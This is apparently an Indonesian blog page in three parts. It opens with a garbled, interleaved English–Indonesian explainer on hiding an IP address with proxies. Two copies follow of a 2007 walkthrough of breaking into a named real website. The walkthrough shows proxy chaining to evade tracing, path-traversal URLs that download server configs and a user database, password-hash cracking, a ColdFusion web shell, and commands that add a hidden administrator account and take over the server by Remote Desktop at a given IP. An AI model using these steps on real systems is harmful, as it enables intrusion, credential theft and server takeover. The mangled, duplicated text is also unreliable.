Bagaimana saya menyembunyikan alamat IP?

Metode yang paling umum Anda untuk menyembunyikan alamat IP adalah dengan menggunakan proxy server dalam satu bentuk atau lainnya. A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A proxy server komputer yang menawarkan layanan jaringan komputer untuk mengizinkan klien untuk melakukan sambungan langsung ke jaringan lainnya layanan jaringan. A client connects to the proxy server and then requests a connection, file, or other resource available on a different server. Klien terhubung ke server proxy kemudian permintaan sambungan, file, atau sumber daya lainnya yang tersedia pada server yang berbeda. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. Proxy menyediakan sumber daya baik oleh menghubungkan ke server atau ditentukan oleh melayani dari cache. In some cases, the proxy may alter the client's request or the server's response for various purposes. Dalam beberapa kasus, proxy dapat mengubah permintaan klien atau server Tanggapan untuk berbagai tujuan.

There are several implementations of proxy servers that you can use to hide your IP address (in an attempt to remain anonymous on the internet): Ada beberapa implementasi dari server proxy yang dapat digunakan untuk menyembunyikan alamat IP (sebagai upaya untuk tetap anonim di internet):

Website Based Proxy Servers Berdasarkan situs web proxy Server

A Website based proxy server is a website that provides a form for you to enter the URL of a website that you wish to anonymously visit. J Website berbasis server proxy adalah sebuah website yang menyediakan formulir bagi Anda untuk memasukkan URL situs Web yang ingin Anda kunjungi secara anonim. When you submit the form the website proxy server makes a request for the page that you want to visit. Bila Anda menyerahkan formulir di situs server proxy membuat permintaan untuk halaman yang ingin Anda kunjungi. The machine usually does not identify itself as a proxy server and does not pass along your IP address in the request for the page. Mesin biasanya tidak mengidentifikasi diri sebagai proxy server dan tidak meneruskan alamat IP dalam permintaan untuk halaman. The features of these sites vary (ad blocking, javascript blocking, etc) as does their price. Fitur yang berbeda dari situs-situs (memblokir iklan, memblokir javascript, dll) yang tidak harganya. Some are free and some charge. Beberapa bebas dan beberapa biaya. Examples of website proxy services are: Contoh situs web proxy layanan adalah:

• Proxify.com Proxify.com

Browser Configured Proxy Servers Browser dikonfigurasi Proxy Server

There are also stand alone proxy servers that allow for you to configure your browser to route your browser traffic through that machine, which then makes a request for a page on your behalf, and then sends you the results. Ada juga berdiri sendiri server proxy yang memungkinkan Anda untuk mengkonfigurasikan browser untuk rute lalu lintas melalui browser yang mesin, yang kemudian membuat permintaan untuk halaman atas nama Anda, kemudian mengirimkan hasil Anda. These are usually used at no cost to the user. Ini biasanya digunakan tanpa biaya bagi pengguna. Since they are accessible to the public these are often quite slow. Karena dapat diakses oleh publik sering kali ini agak lambat. Please see instructions for using a proxy server . There are a variety of types of these proxy servers: Silakan lihat petunjuk untuk menggunakan server proxy. Ada berbagai jenis server proxy ini:

• Transparent Proxy - This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. Transparan proxy - Jenis server proxy mengidentifikasi diri sebagai proxy server dan juga membuat alamat IP yang asli tersedia melalui http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. Biasanya ini digunakan untuk kemampuan mereka untuk cache situs Web dan tidak efektif memberikan identitas kepada mereka yang menggunakannya. However, the use of a transparent proxy will get you around simple IP bans. Namun, penggunaan transparan proxy anda akan mendapatkan sekitar IP bans sederhana. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.) This type of proxy server does not hide your IP address. Mereka transparan dalam hal alamat IP yang terkena, tidak transparan dalam istilah yang anda tidak tahu bahwa Anda menggunakannya (sistem anda tidak dikonfigurasi secara khusus untuk menggunakannya.) Jenis proxy server tidak menyembunyikan IP anda alamat.
• Anonymous Proxy - This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. Anonymous Proxy - Jenis server proxy mengidentifikasi diri sebagai server proxy, tetapi tidak membuat asli alamat IP yang tersedia. This type of proxy server is detectable, but provides reasonable anonymity for most users. Jenis ini adalah server proxy detectable, tetapi memberikan anonimitas yang wajar bagi sebagian besar pengguna. This type of proxy server will hide your IP address. Jenis server proxy akan menyembunyikan alamat IP Anda.
• Distorting Proxy - This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. Distorting Proxy - Jenis server proxy mengidentifikasi diri sebagai server proxy, tetapi tidak benar asli membuat alamat IP yang tersedia melalui http headers. This type of proxy server will hide your IP address. Jenis server proxy akan menyembunyikan alamat IP Anda.
• High Anonymity Proxy - This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. Anonimitas tinggi Proxy - Jenis server proxy tidak mengidentifikasi diri sebagai proxy server dan tidak menyediakan alamat IP yang asli. This type of proxy server will hide your IP address. Jenis server proxy akan menyembunyikan alamat IP Anda.

Installed Software Proxy Servers Software Proxy Server Terinstal

There are a variety of companies and software packages available at either a onetime cost or at an annual subscription. Ada berbagai perusahaan dan paket perangkat lunak yang tersedia di baik sekali pakai atau biaya berlangganan tahunan. These are usually faster and more reliable than the above proxy servers. Ini biasanya lebih cepat dan lebih handal di atas dari server proxy. Some of these services would include: Beberapa dari layanan ini akan mencakup:

• IP Saya
• sembunyi ip
  
• GhostSurf 2007 Platinum GhostSurf Platinum 2007
• TOR TOR

hack2

Situs www.rasasayang.com.my secara sekilas terlihat tidak memiliki bug yang cukup berarti untuk dieksploitasi oleh hacker. Namun ternyata masih terdapat celah yang bisa dieksploitasi. Berikut ini langkah-langkah yang dilakukan untuk membobol server ini. 1. Persiapan hacking
2. Pemeriksaan bug
3. Mendownload source code dan file konfigurasi
4. Mengupload file explorer dan windows shell command interface
5. Mengambil-alih server Saya akan menjelaskan langkah-langkah di atas satu per satu. 1. Persiapan hacking
Sebelumnya Anda harus memiliki list proxy server yang mendukung proxy-chain untuk menghindari pelacakan. Anda harus mengkoneksikan sekurang-kurangnya 2 anonymous proxy server di 2 negara yang berbeda. Anda dengan mudah mendapatkan proxy server di search engine Google. Namun bila Anda menemukan lebih banyak transparant proxy server, gunakan 3 transparant proxy server yang mendukung chain, dan rutekan koneksinya melintasi beberapa negara, misalnya: Brazil - China - India, sehingga bila dilacak oleh "Pengejar Hacker" maka mereka hanya akan melacak koneksi dari ISP Indonesia ke China. Pada sistem operasi windows, anda dapat menggunakan software mungil bouncer.exe untuk melakukan proxy-chain melalui parameter tunneling. Contoh dengan IP lokal 192.168.0.5: bouncer --bind 192.168.0.5 --port 8881 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer --bind 192.168.0.5 --port 8882 --tunnel 192.168.0.5:8881 --destination 200.0.0.1:3128 Pada contoh di atas, bila kita mengeset proxy pada internet browser menjadi 192.168.0.5:8882 maka koneksi kita akan dirutekan melalui proxy server: 82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 -> www.rasasayang.com.my Karena kita menggunakan transparant proxy server maka IP 221.0.0.1 juga akan terlacak. Namun ini tidak masalah karena kita sebenarnya terkoneksi dari proxy server 82.0.0.1.
2. Pemeriksaan bug
Pemeriksaan dilakukan secara trial and error pada setiap parameter yang diperkirakan mengandung bug. Pada kasus ini terdapat bug pada module downloading file untuk mendownload file .mp3 dengan URL: http://www.rasasayang.com.my/index.cfm??dir=download&menu=home&task=dl_comm&cfile= Dari parameter di atas terlihat file dl_comm.cfm terletak pada folder download. Sekarang kita coba secara langsung mengeksekusi pada file .cfm tersebut dan menyisipkan parameter querystring cfile untuk mendapatkan source codenya. http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\download\dl_comm.cfm Ternyata hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian penting dari source code tersebut.

Dari source code ini kita bisa menemukan bahwa terdapat parameter querystring abs_dir dan cfile yang bisa mengarahkan kita untuk mendownload file apa saja dari harddisk server.
3. Mendownload source code dan file konfigurasi Kita jejaki setiap link di dalam source code-nya, kemudian kita download. Misalnya: http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\application.cfm
http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\index.cfm Dari kumpulan file inilah kemudian kita mendapatkan bocoran source code situs www.rasasayang.com.my yang telah diberitakan sebelumnya di situs ini. Selanjutnya kita download file konfigurasi web servernya dengan cara berikut: File konfigurasi IIS:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\WINDOWS\system32\inetsrv\MetaBase.xml File konfigurasi CFM:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\CFusionMX7\lib\neo-query.xml File History Internet Explorer untuk Administrator
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat Dari file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs web yang hosting di server ini.
- www.powerofpaytv.com, www.thepowerofpaytv.com yang terletak di E:\webuser\web\powerofpaytv.com
- www.jedrealty.com yang terletak di E:\webuser\web\jedrealty.com
- www.rasasayang.com.my yang terletak di E:\webuser\web\rasasayang.com.my Dari file index.dat kita dapat mengetahui bahwa Administrator melakukan proses administrasi upload dan download file dengan mengunjungi http://www.powerofpaytv.com/cometadvance/ Dari file neo-query.xml kita dapat mengetahui file database pengguna terletak di E:\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db.mdb yang dapat kita download melalui:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=E:\&CFILE=..\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db.mdb Dari file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password dalam bentuk MD5 hash. Dengan menggunakan software decryptor misalnya Cain & Abel kita dapat mendecyrpt passwordnya.
4. Mengupload file explorer dan windows shell command interface
Dari http://www.powerofpaytv.com/cometadvance/ kita dapat mengupload file explorer misalnya ASF File Explorer yang dibuat oleh Nahuel Foronda and Laura Arguello. Dengan ASF File Explorer, kita dapat membrowse file di harddisk secara lebih leluasa, serta meng-upload, download dan delete file. Untuk windows shell command interface, kita buatkan file.CFM dengan script berikut:








#Replace(Replace(Replace('#cmdResult#', '<', '<', 'all'), '>', '>', 'all'), Chr(10), '
', 'all')#

5. Mengambil-alih server
Kita dapat menambahkan user login windows (group administrator) dengan mengeksekusi perintah berikut pada windows shell command interface. NET USER mbahjambon mypassword /ADD /ACTIVE:YES /EXPIRES:NEVER /PASSWORDCHG:YES
NET LOCALGROUP Administrators mbahjambon /ADD Dengan menggunakan Windows Remote Desktop kita dapat mengambil alih servernya (IP 202.157.176.17). Koneksinya tetap dilakukan melalui proxy tunneling seperti contoh berikut: bouncer --bind 192.168.0.5 --port 8883 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer --bind 192.168.0.5 --port 8884 --tunnel 192.168.0.5:8883 --destination 202.157.176.17:3389 sehingga kita dapat meremote server melalui Remote Desktop pada alamat: 192.168.0.5:8884 Demikian cara yang digunakan untuk membobol server situs www.rasasayang.com.my. Dengan membaca tulisan ini, mudah-mudahan para pembaca dapat menghindari bug sejenis pada server Anda.

hack

Studi Kasus kelemahan Server Situs www.rasasayang.com.my
Oleh Satria Kelana
Published: Oktober 29, 2007
Print

Situs www.rasasayang.com.my secara sekilas terlihat tidak memiliki bug yang cukup berarti untuk dieksploitasi oleh hacker. Namun ternyata masih terdapat celah yang bisa dieksploitasi. Berikut ini langkah-langkah yang dilakukan untuk membobol server ini.

1. Persiapan hacking
2. Pemeriksaan bug
3. Mendownload source code dan file konfigurasi
4. Mengupload file explorer dan windows shell command interface
5. Mengambil-alih server

Saya akan menjelaskan langkah-langkah di atas satu per satu.

1. Persiapan hacking
Sebelumnya Anda harus memiliki list proxy server yang mendukung proxy-chain untuk menghindari pelacakan. Anda harus mengkoneksikan sekurang-kurangnya 2 anonymous proxy server di 2 negara yang berbeda. Anda dengan mudah mendapatkan proxy server di search engine Google. Namun bila Anda menemukan lebih banyak transparant proxy server, gunakan 3 transparant proxy server yang mendukung chain, dan rutekan koneksinya melintasi beberapa negara, misalnya: Brazil - China - India, sehingga bila dilacak oleh "Pengejar Hacker" maka mereka hanya akan melacak koneksi dari ISP Indonesia ke China.

Pada sistem operasi windows, anda dapat menggunakan software mungil bouncer.exe untuk melakukan proxy-chain melalui parameter tunneling. Contoh dengan IP lokal 192.168.0.5:

bouncer --bind 192.168.0.5 --port 8881 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer --bind 192.168.0.5 --port 8882 --tunnel 192.168.0.5:8881 --destination 200.0.0.1:3128

Pada contoh di atas, bila kita mengeset proxy pada internet browser menjadi 192.168.0.5:8882 maka koneksi kita akan dirutekan melalui proxy server: 82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 -> www.rasasayang.com.my

Karena kita menggunakan transparant proxy server maka IP 221.0.0.1 juga akan terlacak. Namun ini tidak masalah karena kita sebenarnya terkoneksi dari proxy server 82.0.0.1.

2. Pemeriksaan bug
Pemeriksaan dilakukan secara trial and error pada setiap parameter yang diperkirakan mengandung bug. Pada kasus ini terdapat bug pada module downloading file untuk mendownload file .mp3 dengan URL:

http://www.rasasayang.com.my/index.c...dl_comm&cfile=

Dari parameter di atas terlihat file dl_comm.cfm terletak pada folder download. Sekarang kita coba secara langsung mengeksekusi pada file .cfm tersebut dan menyisipkan parameter querystring cfile untuk mendapatkan source codenya.

http://www.rasasayang.com.my/downloa...ad\dl_comm.cfm

Ternyata hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian penting dari source code tersebut.





Dari source code ini kita bisa menemukan bahwa terdapat parameter querystring abs_dir dan cfile yang bisa mengarahkan kita untuk mendownload file apa saja dari harddisk server.


3. Mendownload source code dan file konfigurasi

Kita jejaki setiap link di dalam source code-nya, kemudian kita download. Misalnya:

http://www.rasasayang.com.my/downloa...pplication.cfm
http://www.rasasayang.com.my/downloa...E=..\index.cfm

Dari kumpulan file inilah kemudian kita mendapatkan bocoran source code situs www.rasasayang.com.my yang telah diberitakan sebelumnya di situs ini.

Selanjutnya kita download file konfigurasi web servernya dengan cara berikut:

File konfigurasi IIS:
http://www.rasasayang.com.my/downloa...v\MetaBase.xml

File konfigurasi CFM:
http://www.rasasayang.com.my/downloa...\neo-query.xml

File History Internet Explorer untuk Administrator
http://www.rasasayang.com.my/downloa...E=..\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat

Dari file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs web yang hosting di server ini.
- www.powerofpaytv.com, www.thepowerofpaytv.com yang terletak di E:\webuser\web\powerofpaytv.com
- www.jedrealty.com yang terletak di E:\webuser\web\jedrealty.com
- www.rasasayang.com.my yang terletak di E:\webuser\web\rasasayang.com.my

Dari file index.dat kita dapat mengetahui bahwa Administrator melakukan proses administrasi upload dan download file dengan mengunjungi http://www.powerofpaytv.com/cometadvance/

Dari file neo-query.xml kita dapat mengetahui file database pengguna terletak di E:\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db. mdb yang dapat kita download melalui:
http://www.rasasayang.com.my/downloa..._casbaa_db.mdb

Dari file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password dalam bentuk MD5 hash. Dengan menggunakan software decryptor misalnya Cain & Abel kita dapat mendecyrpt passwordnya.


4. Mengupload file explorer dan windows shell command interface
Dari http://www.powerofpaytv.com/cometadvance/ kita dapat mengupload file explorer misalnya ASF File Explorer yang dibuat oleh Nahuel Foronda and Laura Arguello. Dengan ASF File Explorer, kita dapat membrowse file di harddisk secara lebih leluasa, serta meng-upload, download dan delete file.

Untuk windows shell command interface, kita buatkan file.CFM dengan script berikut:










#Replace(Replace(Replace('#cmdResult#', '<', '<', 'all'), '>', '>', 'all'), Chr(10), '
', 'all')#



5. Mengambil-alih server
Kita dapat menambahkan user login windows (group administrator) dengan mengeksekusi perintah berikut pada windows shell command interface.

NET USER mbahjambon mypassword /ADD /ACTIVE:YES /EXPIRES:NEVER /PASSWORDCHG:YES
NET LOCALGROUP Administrators mbahjambon /ADD

Dengan menggunakan Windows Remote Desktop kita dapat mengambil alih servernya (IP 202.157.176.17). Koneksinya tetap dilakukan melalui proxy tunneling seperti contoh berikut:

bouncer --bind 192.168.0.5 --port 8883 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer --bind 192.168.0.5 --port 8884 --tunnel 192.168.0.5:8883 --destination 202.157.176.17:3389

sehingga kita dapat meremote server melalui Remote Desktop pada alamat: 192.168.0.5:8884

Demikian cara yang digunakan untuk membobol server situs www.rasasayang.com.my. Dengan membaca tulisan ini, mudah-mudahan para pembaca dapat menghindari bug sejenis pada server Anda.


sumber:
-http://www.jasakom.com/index.php?cat..._articleid=569